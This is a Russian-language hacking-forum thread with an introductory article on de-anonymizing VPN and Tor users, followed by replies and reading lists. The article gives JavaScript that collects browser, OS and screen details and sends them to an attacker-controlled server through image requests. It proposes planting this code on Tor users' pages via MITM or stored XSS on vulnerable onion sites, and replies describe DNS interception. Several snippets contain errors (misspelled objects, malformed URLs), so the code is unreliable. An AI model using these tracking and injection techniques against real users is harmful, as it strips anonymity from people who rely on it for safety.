• 🚨 Ещё можно успеть на курс «OSINT: технология боевой разведки» от Академии Кодебай

    🔍 Изучите методы разведки с использованием открытых источников (OSINT) для проведения успешных атак.
    🛠️ Освойте ключевые инструменты, такие как Maltego, TheHarvester и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальную разведку.
    🧠 Развивайте навыки, которые помогут вам стать экспертом в области информационной безопасности.

    Запись открыта до 23 мая Подробнее о курсе ...

Статья Деанонимизация пользователей, Введение

  • Автор темы Автор темы DefWolf
  • Дата начала Дата начала
1579468767535.png

Многие думают, что раз они настроили VPN или Tor, то шанс, что их вычислят равен 0. Они не правы. Вообще, что значит сам термин Деанонимизация ?

Деанонимизация - это нарушение анонимности, когда о вас узнают, то что вы скрывали начиная от ip адреса, заканчивая Именем и Фамилией. Все мы оставляем некие цифровые следы или как их еще называют кибер тень. Это информация о нас как долго мы находились в сети, наши куки, информация о разрешении нашего монитора, установленных в системе шрифтов, часового пояса, какие плагины установлены в вашем браузере. Из всех полученных данных составляют цифровой след. Далее идет система мониторинга, т.е идет сравнение следа, где и какие сайты вы посещали. Соглашусь, что звучит это как-то нереально, это действительно рабочий способ, давно применяемый на практике. Итак, давайте приступим к написания скрипта.

Первое, что нам нужно узнать - это OC:
JavaScript:
var pic = new Image();
pic.src = 'http:Youserver//?info='+navigator.platform; // OC
Далее нам нужно собрать HTTP заголовки и информацию о браузере:
JavaScript:
pic.src ='http:Youserver//?info='+ navigator.appName     //Имя браузера
pic.src = 'http:Youserver//?info='+ navigator.userAgent   //Агент пользователя
pic.src = 'http:Youserver//?info='+ navigator.appVersion  //Версия броузера
pic.src = 'http:Youserver//?info='+ lnavigator.language   //Язык системы
Далее соберем как можно более подробную информацию о компьютере:
JavaScript:
pic.src = +screen.width      //Ширина монитора
pic.scr = 'http:Youserver//?info='+screen.height     //Высота  монитора
pic.src = 'http:Youserver//?info='+screen.pixelDepth //Разрешение монитора
pic.src = 'http:Youserver//?info='+screen.colorDepth //Цетовая гамма

А этот код выведет оставшуюся информацию из объекта navigator:
JavaScript:
for(var prop in navigator) {
if (navigator[prop] instanceof Object || navigator[prop]==='') continue
conole.log(prop+": "+navigator[prop])
}
Так как это вводная статья мы остановимся. И перейдем к способам деанонимизации Tor. Итак, допустим наша цель пользуется Tor и чувствует себя вполне безопасно. Что же мы можем сделать, мы можем провести MITM атаку и вставить Javascript код во все посещаемые страницы. Можем поднять подготовленную страницу под определенную аудиторию, допустим наша цель любит Хакерские форумы. Найти уязвимые к хранимым XSS сайты и вставить наш код. Исследователи просканировали 100 onion сайтов и 30% из них были уязвимы к XSS. Мы можем собрать уникальную БД цифровых следов. Идентифицировать Tor пользователя можно использую функцию:
Код:
 measureText() и getBoundingClientRect()
Если мы получим уникальное значение, то мы сможем идентифицировать пользователя. Первая функция измеряет ширину текста, а вторая позволяют узнать ширину и высоту прямоугольника. Еще способы идентификации это измерить скорость взаимодействия с колёсиком мыши и получить характеристику CPU пользователя.

38ffea79991af4ff078c34534893247f.png


84be19eb0a7325e9b69523c66a90ea79.png


Noscript снизит риск всего на 50%. Так что сильно на него не надейтесь. Это была теоретическая статья и в следующей статье мы рассмотрим на практики, где в качестве цели будем идентифицировать пользователей уязвимого onion сайта. Пока насчет MITM атаки не знаю, но XSS будет точно.
 
Это были новые методы деадона открытые менее года назад, про dns и http и так все знают и они уже давно как не рабочие, т.к. уязвимости заделывают, попробуй одной из перечисленных технологий сделать деадон. Но я рассмотрю эти технологии в след. статье вместе с практикой.

Он у большинства года как 3 закрыт. К 100% деадону в TOR ни один из твоих способов не приведет, можешь сам проверить на практике.
все dns серверы работают на 53 порту. все открытым текстом. без вариантов. в последнее время популярно DNSSEC или DNSCrypt(который кстати теперь тоже открытым текстом, но с DNSSEC лол, шифрование в DNSCrypt 2.0 прикрыли)
перехватываются пакеты которые идут на стабильно один и тот же порт открытым текстом, это дело забавы, и далее подмена адреса и переадресация на заглушку, если DNSSEC то сайт просто будет недоступен. типичная MITM. атака также может быть легко и через впн, где тебе подменят точно также как и провайдер, но владельцы впн.
все это уже давно проверено)
тор на выходных нодах имеет теже уязвимости. контроллер ноды может все что угодно сделать с твоим незашифрованным траффиком
 
все dns серверы работают на 53 порту. все открытым текстом. без вариантов. в последнее время популярно DNSSEC или DNSCrypt(который кстати теперь тоже открытым текстом, но с DNSSEC лол, шифрование в DNSCrypt 2.0 прикрыли)
перехватываются пакеты которые идут на стабильно один и тот же порт открытым текстом, это дело забавы, и далее подмена адреса и переадресация на заглушку, если DNSSEC то сайт просто будет недоступен. типичная MITM. атака также может быть легко и через впн, где тебе подменят точно также как и провайдер, но владельцы впн.
все это уже давно проверено)
тор на выходных нодах имеет теже уязвимости. контроллер ноды может все что угодно сделать с твоим незашифрованным траффиком
Хорошо, но 53 порты уже давно не так уязвимы, но сам метод довольно интересен, но он уж точно не пойдет на всех сайтах. Возможно я проверю его на практике и если сработает, то расскажу в след. статье
 
  • Нравится
Реакции: aureus
Хорошо, но 53 порты уже давно не так уязвимы, но сам метод довольно интересен, но он уж точно не пойдет на всех сайтах. Возможно я проверю его на практике и если сработает, то расскажу в след. статье

ну что значит 53 не так уязвимы? уязвимость портов это уязвимость конкретно программы которая работает на этом порту, сами серверы скорее всего неуязвимы, уязвим траффик который проходит через эти порты. вот с ним огромное количество манипуляций на разных участках сети и производят. в том числе и MITM когда траффик проходит через какое то устройство которое расположено в сети "ближе" чем DNS серв и которое производит с ним какие либо манипуляции. т.е производится перехват и подмена.
DNSSEC защищает от подмены, но не шифрует. так что воз и ныне там.
можно много написать и про все остальное, но лучше давай уж сам)
 
  • Нравится
Реакции: DefWolf
ну что значит 53 не так уязвимы? уязвимость портов это уязвимость конкретно программы которая работает на этом порту, сами серверы скорее всего неуязвимы, уязвим траффик который проходит через эти порты. вот с ним огромное количество манипуляций на разных участках сети и производят. в том числе и MITM когда траффик проходит через какое то устройство которое расположено в сети "ближе" чем DNS серв и которое производит с ним какие либо манипуляции. т.е производится перехват и подмена.
DNSSEC защищает от подмены, но не шифрует. так что воз и ныне там.
можно много написать и про все остальное, но лучше давай уж сам)
Ох.. я к тому, что все это защищают, но спасибо, ты бы мог круто дополнить статью, но она носит немного другой характер. )
 
вот например хорошо написано про уязвимость http
Спасибо, но про это я знаю и в протоколе HTTPS, тоже есть уязвимости, но спасибо за информацию, было бы классно обменяться инофрмацией в личных сообщениях.
 
Ваше --> Очень круто что затронул такую интересную тему, но она поможет только в случае когда человек использует : vpn tor и не поможет в случает когда в цепочке присутствует дедик

Мое --> Вот именно такие и совершают провалы, ощущая себя под защитой.

Данным коментарием, я выражаю мысль: 80% людей, начавших свой жизненный цикл в теме ИБ, кроме как ВПН и ТОР не знают, для них это панацея от всех болезней. Как следствие, люди выходят на разного рода подвиги, обувшись в ТОР и обернув себя ВПН, и при нужном или не нужном исходе события оказываются раскрыты, к примеру по той схеме, как описал топик стартер.

Я констатитрую факт через Ваше высказывание.



Google or DDG: Users Deanonimization System pdf & Deanonymizing Tor pdf & Trawling Tor Hidden Services pdf
 


Google or DDG: Users Deanonimization System pdf & Deanonymizing Tor pdf & Trawling Tor Hidden Services pdf
благодарствую друже! только хотел поискать материалы по деанонимизации и контролю в торе, а тут вы со своим уникальным даром находить и структурировать информацию... есть что ночью почитать... ещё раз благодарю!
 
благодарствую друже! только хотел поискать материалы по деанонимизации и контролю в торе, а тут вы со своим уникальным даром находить и структурировать информацию... есть что ночью почитать... ещё раз благодарю!
Здрав будь, друже! Благодарю за отзыв. Давай уж на ты:) Значит правильно хотел и нашел! Тема сама по себе глобальная, всегда нужно помнить и не забывать, кто, где, когда создал этот самый Tor и не только и в чьей юрисдикции он находится. Любой дар нарабатывается репетициями, главное - любить то, что делаешь и делать то, что любишь. Вот ещё интересные операторы:

Google or DDG: tor nsa pdf & tor ts/si pdf & tor onion router pdf Удачи в рекогносцировках!
 
  • Нравится
Реакции: ghost
тут +100500... если чего то захотеть, и для добрых дел а не во вред, то сама жизнь тебе начинает помогать... )
Получается, что сама жизнь захотела, чтобы каждый оказался в нужном месте в нужное время для добрых дел:giggle:
 
Новые всмысле определять пользователя по движении мышки, шрифтам, получить характеристику CPU =) . Это позволяет составить более уникальный цифровой след. И самое интересное, что разработчики заявили, что они не будут блокировать эти функции. Это была 1 часть статьи. В дальнейшим мы рассмотрим еще пару способов уже более интересных на практике.

Идентификация пользователя по движениям мышки:
Google or DDG:
User Identifying Mouse Biometrics pdf
User Authentication Mouse pdf
User Keystroke Mouse pdf
User Mouse Behavioral Biometrics pdf

Идентификация пользователя по клавиатурному почерку:
Google or DDG:
User Keyboard Behavior pdf
User Keyboard Authentication pdf
Keyboard Authentication Security pdf
Keyboard Biometrics Security pdf

Уникальный цифровой след пользователя:
Google or DDG:
User Digital Footprint pdf
Digital Footprint Identification pdf
 
Идентификация пользователя по движениям мышки:
Google or DDG:
User Identifying Mouse Biometrics pdf
User Authentication Mouse pdf
User Keystroke Mouse pdf
User Mouse Behavioral Biometrics pdf

Идентификация пользователя по клавиатурному почерку:
Google or DDG:
User Keyboard Behavior pdf
User Keyboard Authentication pdf
Keyboard Authentication Security pdf
Keyboard Biometrics Security pdf

Уникальный цифровой след пользователя:
Google or DDG:
User Digital Footprint pdf
Digital Footprint Identification pdf

Tracking Internet users have several purposes; for example preventing online fraud or measuring and analysing online advertisements. The most
common current methods for tracking users involve storing unique identiers locally on the user's device, a method which may be restricted by law in the future. Analysing Internet traffic is the core business for many companies and tracking users is an essential part of such analysis.

However, forthcoming laws may restrict companies and organisations from using methods that store identiers on client devices. Such restrictions does not, in any way, reduce the demand for reliable methods for tracking website users. A browser fingerprint is a set of properties of a device and its software which is gathered from a web browser.

Google or DDG:
browser fingerprinting pdf
browser fingerprinting thesis pdf
tracking browser fingerprinting pdf


















 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD